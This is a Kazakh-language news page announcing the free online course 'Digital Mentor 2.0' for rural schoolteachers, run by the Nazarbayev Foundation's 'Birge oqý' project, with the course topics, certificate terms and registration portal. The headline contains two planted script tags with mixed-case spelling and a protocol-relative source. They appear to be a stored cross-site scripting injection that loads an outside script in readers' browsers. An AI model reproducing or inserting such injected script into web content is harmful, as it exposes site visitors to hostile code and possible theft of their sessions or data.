Нұрсултан Назарбаев Қоры мен Елбасы Академиясы бастаған "Birge oqý" жобасының ұжымы ауыл мектептерінің мұғалімдеріне «Цифрлы ментор 2.0» тегін онлайн курсы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.08.2020

Нұрсултан Назарбаев Қоры мен Елбасы Академиясы бастаған "Birge oqý" жобасының ұжымы ауыл мектептерінің мұғалімдерін «Цифрлы ментор 2.0» тегін онлайн курсына қатысуға шақырады.

Қашықтан оқытуға арналған 4 күндік курс 10 тамызда басталады.

Курс барысында Сіздер:

- қашықтан оқытудың терминологиясы мен негізгі қағидаларын;

- белсенді оқыту мен бағалау әдістерін;

- өзіңіздің жеке онлайн курсыңызды дайындау құралдарын үйрене аласыздар.

Оқыту барысында сіз анимациялық презентациялар жасауды, мини бейне-сабағын қалай түсіруді үйренесіз, содан кейін мұның бәрін цифрлы портфолиоңызда жинақтай аласыз.

Курс аяқталғаннан кейін қатысушыларға «Цифрлы ментор 2.0» электронды сертификаты табысталады (ол үшін тапсырмалардың 75% -ы сәтті орындалуы керек). Ал "Цифрлы ментор 2.0" курсының үздік қатысушылары Елбасы Академиясы жанындағы "Birge oqý" қашықтан оқыту мектебіне мұғалімдер мен тьюторлар ретінде жұмысқа шақырылады.

Курсқа тіркелу https://elumiti.fnn.kz/ порталы арқылы жүзеге асады.

Тіркелу бойынша бейне-нұсқаулық сілтеме арқылы қолжетімді

Просмотров: 557


Пікір қосу



Деректерді қолтаңбаға қосу